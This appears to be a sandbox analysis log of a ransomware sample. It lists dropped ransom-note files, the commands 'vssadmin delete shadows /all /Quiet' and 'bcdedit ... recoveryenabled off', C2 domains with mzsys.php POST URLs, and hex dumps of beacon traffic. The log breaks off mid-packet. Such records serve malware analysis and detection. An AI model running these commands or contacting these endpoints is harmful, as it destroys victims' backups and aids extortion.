Creates FileC:\Documents and Settings\Administrator\Templates\excel4.xls
Creates FileC:\Documents and Settings\Administrator\Templates\wordpfct.wpd
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\appcompat.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Templates\excel.xls
Creates FileC:\Documents and Settings\Administrator\Templates\powerpnt.ppt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dd_netfx20MSI3716.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Templates\quattro.wb2
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+jay.png
Creates FilePIPE\srvsvc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+jay.txt
Creates Process: vssadmin.exe delete shadows /all /Quiet
Creates Process: bcdedit.exe /set {current} recoveryenabled off
Creates Mutex: __sys_234238233295

Process
↳ bcdedit.exe /set {current} recoveryenabled off

Process
↳ vssadmin.exe delete shadows /all /Quiet

Creates File: PIPE\lsarpc

Network Details:

DNS: hnb.net
Type: A
222.165.133.242
DNS: firecheerleaders.fr
Type: A
213.186.33.171
DNS: ladiesdehaan.be
Type: A
62.210.92.9
DNS: chonburicoop.net
Type: A
27.254.96.151
DNS: passlift.com
Type: A
217.116.196.239
DNS: actionpourisrael.com
Type: A
213.186.33.4
HTTP POST: http://hnb.net/templates/assets/email_tmpl/uploads/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POST: http://firecheerleaders.fr/modules/mod_cmscore/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POST: http://ladiesdehaan.be/modules/mod_cmscore/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POST: http://chonburicoop.net/tmp/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POST: http://passlift.com/templates/sj_icenter/html/mod_k2_content/Default/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POST: http://actionpourisrael.com/modules/mod_speedup/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Flows TCP: 192.168.1.1:1031 ➝ 222.165.133.242:80
Flows TCP: 192.168.1.1:1032 ➝ 213.186.33.171:80
Flows TCP: 192.168.1.1:1033 ➝ 62.210.92.9:80
Flows TCP: 192.168.1.1:1034 ➝ 27.254.96.151:80
Flows TCP: 192.168.1.1:1035 ➝ 217.116.196.239:80
Flows TCP: 192.168.1.1:1036 ➝ 213.186.33.4:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7465 6d706c61 7465732f   POST /templates/
0x00000010 (00016)   61737365 74732f65 6d61696c 5f746d70   assets/email_tmp
0x00000020 (00032)   6c2f7570 6c6f6164 732f6d7a 7379732e   l/uploads/mzsys.
0x00000030 (00048)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000040 (00064)   63657074 3a206e2c 202c202c 202c202c   cept: n, , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000070 (00112)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000080 (00128)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000090 (00144)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x000000a0 (00160)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x000000b0 (00176)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000c0 (00192)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000d0 (00208)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000e0 (00224)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000f0 (00240)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x00000100 (00256)   0a486f73 743a2068 6e622e6e 65740d0a   .Host: hnb.net..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   3634350d 0a436163 68652d43 6f6e7472   645..Cache-Contr
0x00000130 (00304)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000140 (00320)   64617461 3d453738 38433145 37393637   data=E788C1E7967
0x00000150 (00336)   45353833 31363831 42453243 34433646   E5831681BE2C4C6F
0x00000160 (00352)   39344537 45434436 32333330 33433642   94E7ECD623303C6B
0x00000170 (00368)   37443141 46313141 45394641 38413331   7D1AF11AE9FA8A31
0x00000180 (00384)   39433642 34454346 38334445 45313143   9C6B4ECF83DEE11C
0x00000190 (00400)   45463441 41374542 33384531 34363641   EF4AA7EB38E1466A
0x000001a0 (00416)   38423332 43383343 39454335 39323643   8B32C83C9EC5926C
0x000001b0 (00432)   31393939 32393243 46303341 36314142   1999292CF03A61AB
0x000001c0 (00448)   32303132 35434543 41444136 42373141   20125CECADA6B71A
0x000001d0 (00464)   37463934 36413344 38373644 36353141   7F946A3D876D651A
0x000001e0 (00480)   33454241 33453139 43323134 30433831   3EBA3E19C2140C81
0x000001f0 (00496)   31314530 37464635 33303145 38434143   11E07FF5301E8CAC
0x00000200 (00512)   44353737 32394430 36334341 34424645   D57729D063CA4BFE
0x00000210 (00528)   35374637 33313545 31464132 32423441   57F7315E1FA22B4A
0x00000220 (00544)   37344445 46393343 35453538 31423031   74DEF93C5E581B01
0x00000230 (00560)   45393631 33383341 35434344 31414238   E961383A5CCD1AB8
0x00000240 (00576)   38334546 31343936 44434234 45344638   83EF1496DCB4E4F8
0x00000250 (00592)   32343545 35333530 41343745 35344239   245E5350A47E54B9
0x00000260 (00608)   30323038 42394445 36453941 43373833   0208B9DE6E9AC783
0x00000270 (00624)   32463543 36463745 44323935 39374344   2F5C6F7ED29597CD
0x00000280 (00640)   32383641 38443233 31433345 43434141   286A8D231C3ECCAA
0x00000290 (00656)   44443646 34363139 36453344 45374644   DD6F46196E3DE7FD
0x000002a0 (00672)   41303239 45344236 39314538 33453036   A029E4B691E83E06
0x000002b0 (00688)   37323939 39414135 36443544 45364545   72999AA56D5DE6EE
0x000002c0 (00704)   39424535 36394544 41454636 36413438   9BE569EDAEF66A48
0x000002d0 (00720)   37303337 37424334 33343631 45364633   70377BC43461E6F3
0x000002e0 (00736)   46463042 35433835 38384143 30323736   FF0B5C8588AC0276
0x000002f0 (00752)   39454343 33453431 39323839 42343736   9ECC3E419289B476
0x00000300 (00768)   36373044 31413243 31324341 37323844   670D1A2C12CA728D
0x00000310 (00784)   43434239 33384543 32304231 31444530   CCB938EC20B11DE0
0x00000320 (00800)   44333946 36364631 37333634 41413246   D39F66F17364AA2F
0x00000330 (00816)   38303645 43333131 30303944 33413944   806EC311009D3A9D
0x00000340 (00832)   38363635 41383545 30453945 43313235   8665A85E0E9EC125
0x00000350 (00848)   33433637 39413741 37353732 35413842   3C679A7A75725A8B
0x00000360 (00864)   43423931 37463341 46353145 44433931   CB917F3AF51EDC91
0x00000370 (00880)   33434246 33343945 39393238 35303430   3CBF349E99285040
0x00000380 (00896)   31463636 36443945 44443745 43413239   1F666D9EDD7ECA29
0x00000390 (00912)   37433032 43333745 38324542 30463037   7C02C37E82EB0F07
0x000003a0 (00928)   34454237 35433736 33304533 34454438   4EB75C7630E34ED8
0x000003b0 (00944)   32383641 43443331 37433946 44463641   286ACD317C9FDF6A
0x000003c0 (00960)   45343630 44                           E460D

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f636d 73636f72 652f6d7a 7379732e   d_cmscore/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a206e2c 202c202c 202c202c   cept: n, , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000070 (00112)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000080 (00128)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000090 (00144)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x000000a0 (00160)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000b0 (00176)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000c0 (00192)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000d0 (00208)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000e0 (00224)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x000000f0 (00240)   0a486f73 743a2066 69726563 68656572   .Host: firecheer
0x00000100 (00256)   6c656164 6572732e 66720d0a 436f6e74   leaders.fr..Cont
0x00000110 (00272)   656e742d 4c656e67 74683a20 3634350d   ent-Length: 645.
0x00000120 (00288)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000130 (00304)   6e6f2d63 61636865 0d0a0d0a 64617461   no-cache....data
0x00000140 (00320)   3d453738 38433145 37393637 45353833   =E788C1E7967E583
0x00000150 (00336)   31363831 42453243 34433646 39344537   1681BE2C4C6F94E7
0x00000160 (00352)   45434436 32333330 33433642 37443141   ECD623303C6B7D1A
0x00000170 (00368)   46313141 45394641 38413331 39433642   F11AE9FA8A319C6B
0x00000180 (00384)   34454346 38334445 45313143 45463441   4ECF83DEE11CEF4A
0x00000190 (00400)   41374542 33384531 34363641 38423332   A7EB38E1466A8B32
0x000001a0 (00416)   43383343 39454335 39323643 31393939   C83C9EC5926C1999
0x000001b0 (00432)   32393243 46303341 36314142 32303132   292CF03A61AB2012
0x000001c0 (00448)   35434543 41444136 42373141 37463934   5CECADA6B71A7F94
0x000001d0 (00464)   36413344 38373644 36353141 33454241   6A3D876D651A3EBA
0x000001e0 (00480)   33453139 43323134 30433831 31314530   3E19C2140C8111E0
0x000001f0 (00496)   37464635 33303145 38434143 44353737   7FF5301E8CACD577
0x00000200 (00512)   32394430 36334341 34424645 35374637   29D063CA4BFE57F7
0x00000210 (00528)   33313545 31464132 32423441 37344445   315E1FA22B4A74DE
0x00000220 (00544)   46393343 35453538 31423031 45393631   F93C5E581B01E961
0x00000230 (00560)   33383341 35434344 31414238 38334546   383A5CCD1AB883EF
0x00000240 (00576)   31343936 44434234 45344638 32343545   1496DCB4E4F8245E
0x00000250 (00592)   35333530 41343745 35344239 30323038   5350A47E54B90208
0x00000260 (00608)   42394445 36453941 43373833 32463543   B9DE6E9AC7832F5C
0x00000270 (00624)   36463745 44323935 39374344 32383641   6F7ED29597CD286A
0x00000280 (00640)   38443233 31433345 43434141 44443646   8D231C3ECCAADD6F
0x00000290 (00656)   34363139 36453344 45374644 41303239   46196E3DE7FDA029
0x000002a0 (00672)   45344236 39314538 33453036 37323939   E4B691E83E067299
0x000002b0 (00688)   39414135 36443544 45364545 39424535   9AA56D5DE6EE9BE5
0x000002c0 (00704)   36394544 41454636 36413438 37303337   69EDAEF66A487037
0x000002d0 (00720)   37424334 33343631 45364633 46463042   7BC43461E6F3FF0B
0x000002e0 (00736)   35433835 38384143 30323736 39454343   5C8588AC02769ECC
0x000002f0 (00752)   33453431 39323839 42343736 36373044   3E419289B476670D
0x00000300 (00768)   31413243 31324341 37323844 43434239   1A2C12CA728DCCB9
0x00000310 (00784)   33384543 32304231 31444530 44333946   38EC20B11DE0D39F
0x00000320 (00800)   36364631 37333634 41413246 38303645   66F17364AA2F806E
0x00000330 (00816)   43333131 30303944 33413944 38363635   C311009D3A9D8665
0x00000340 (00832)   41383545 30453945 43313235 33433637   A85E0E9EC1253C67
0x00000350 (00848)   39413741 37353732 35413842 43423931   9A7A75725A8BCB91
0x00000360 (00864)   37463341 46353145 44433931 33434246   7F3AF51EDC913CBF
0x00000370 (00880)   33343945 39393238 35303430 31463636   349E992850401F66
0x00000380 (00896)   36443945 44443745 43413239 37433032   6D9EDD7ECA297C02
0x00000390 (00912)   43333745 38324542 30463037 34454237   C37E82EB0F074EB7
0x000003a0 (00928)   35433736 33304533 34454438 32383641   5C7630E34ED8286A
0x000003b0 (00944)   43443331 37433946 44463641 45343630   CD317C9FDF6AE460
0x000003c0 (00960)   44bdf9                                D..

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f636d 73636f72 652f6d7a 7379732e   d_cmscore/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a206e2c 202c202c 202c202c   cept: n, , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000070 (00112)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000080 (00128)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000090 (00144)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x000000a0 (00160)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000b0 (00176)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000c0 (00192)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000d0 (00208)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000e0 (00224)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x000000f0 (00240)   0a486f73 743a206c 61646965 73646568   .Host: ladiesdeh
0x00000100 (00256)   61616e2e 62650d0a 436f6e74 656e742d   aan.be..Content-
0x00000110 (00272)   4c656e67 74683a20 3634350d 0a436163   Length: 645..Cac
0x00000120 (00288)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000130 (00304)   61636865 0d0a0d0a 64617461 3d453738   ache....data=E78
0x00000140 (00320)   38433145 37393637 45353833 31363831   8C1E7967E5831681
0x00000150 (00336)   42453243 34433646 39344537 45434436   BE2C4C6F94E7ECD6
0x00000160 (00352)   32333330 33433642 37443141 46313141   23303C6B7D1AF11A
0x00000170 (00368)   45394641 38413331 39433642 34454346   E9FA8A319C6B4ECF
0x00000180 (00384)   38334445 45313143 45463441 41374542   83DEE11CEF4AA7EB
0x00000190 (00400)   33384531 34363641 38423332 43383343   38E1466A8B32C83C
0x000001a0 (00416)   39454335 39323643 31393939 32393243   9EC5926C1999292C
0x000001b0 (00432)   46303341 36314142 32303132 35434543   F03A61AB20125CEC
0x000001c0 (00448)   41444136 42373141 37463934 36413344   ADA6B71A7F946A3D
0x000001d0 (00464)   38373644 36353141 33454241 33453139   876D651A3EBA3E19
0x000001e0 (00480)   43323134 30433831 31314530 37464635   C2140C8111E07FF5
0x000001f0 (00496)   33303145 38434143 44353737 32394430   301E8CACD57729D0
0x00000200 (00512)   36334341 34424645 35374637 33313545   63CA4BFE57F7315E
0x00000210 (00528)   31464132 32423441 37344445 46393343   1FA22B4A74DEF93C
0x00000220 (00544)   35453538 31423031 45393631 33383341   5E581B01E961383A
0x00000230 (00560)   35434344 31414238 38334546 31343936   5CCD1AB883EF1496
0x00000240 (00576)   44434234 45344638 32343545 35333530   DCB4E4F8245E5350
0x00000250 (00592)   41343745 35344239 30323038 42394445   A47E54B90208B9DE
0x00000260 (00608)   36453941 43373833 32463543 36463745   6E9AC7832F5C6F7E
0x00000270 (00624)   44323935 39374344 32383641 38443233   D29597CD286A8D23
0x00000280 (00640)   31433345 43434141 44443646 34363139   1C3ECCAADD6F4619
0x00000290 (00656)   36453344 45374644 41303239 45344236   6E3DE7FDA029E4B6
0x000002a0 (00672)   39314538 33453036 37323939 39414135   91E83E0672999AA5
0x000002b0 (00688)   36443544 45364545 39424535 36394544   6D5DE6EE9BE569ED
0x000002c0 (00704)   41454636 36413438 37303337 37424334   AEF66A4870377BC4
0x000002d0 (00720)   33343631 45364633 46463042 35433835   3461E6F3FF0B5C85
0x000002e0 (00736)   38384143 30323736 39454343 33453431   88AC02769ECC3E41
0x000002f0 (00752)   39323839 42343736 36373044 31413243   9289B476670D1A2C
0x00000300 (00768)   31324341 37323844 43434239 33384543   12CA728DCCB938EC
0x00000310 (00784)   32304231 31444530 44333946 36364631   20B11DE0D39F66F1
0x00000320 (00800)   37333634 41413246 38303645 43333131   7364AA2F806EC311
0x00000330 (00816)   30303944 33413944 38363635 41383545   009D3A9D8665A85E
0x00000340 (00832)   30453945 43313235 33433637 39413741   0E9EC1253C679A7A
0x00000350 (00848)   37353732 35413842 43423931 37463341   75725A8BCB917F3A
0x00000360 (00864)   46353145 44433931 33434246 33343945   F51EDC913CBF349E
0x00000370 (00880)   39393238 35303430 31463636 36443945   992850401F666D9E
0x00000380 (00896)   44443745 43413239 37433032 43333745   DD7ECA297C02C37E
0x00000390 (00912)   38324542 30463037 34454237 35433736   82EB0F074EB75C76
0x000003a0 (00928)   33304533 34454438 32383641 43443331   30E34ED8286ACD31
0x000003b0 (00944)   37433946 44463641 45343630 44343630   7C9FDF6AE460D460
0x000003c0 (00960)   44bdf9                                D..

0x00000000 (00000)   504f5354 202f746d 702f6d7a 7379732e   POST /tmp/mzsys.
0x00000010 (00016)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a206e2c 202c202c 202c202c   cept: n, , , , ,
0x00000030 (00048)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000060 (00096)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000070 (00112)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000080 (00128)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x00000090 (00144)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000a0 (00160)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000b0 (00176)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000c0 (00192)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000d0 (00208)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x000000e0 (00224)   0a486f73 743a2063 686f6e62 75726963   .Host: chonburic
0x000000f0 (00240)   6f6f702e 6e65740d 0a436f6e 74656e74   oop.net..Content
0x00000100 (00256)   2d4c656e 6774683a 20363435 0d0a4361   -Length: 645..Ca
0x00000110 (00272)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000120 (00288)   63616368 650d0a0d 0a646174 613d4537   cache....data=E7
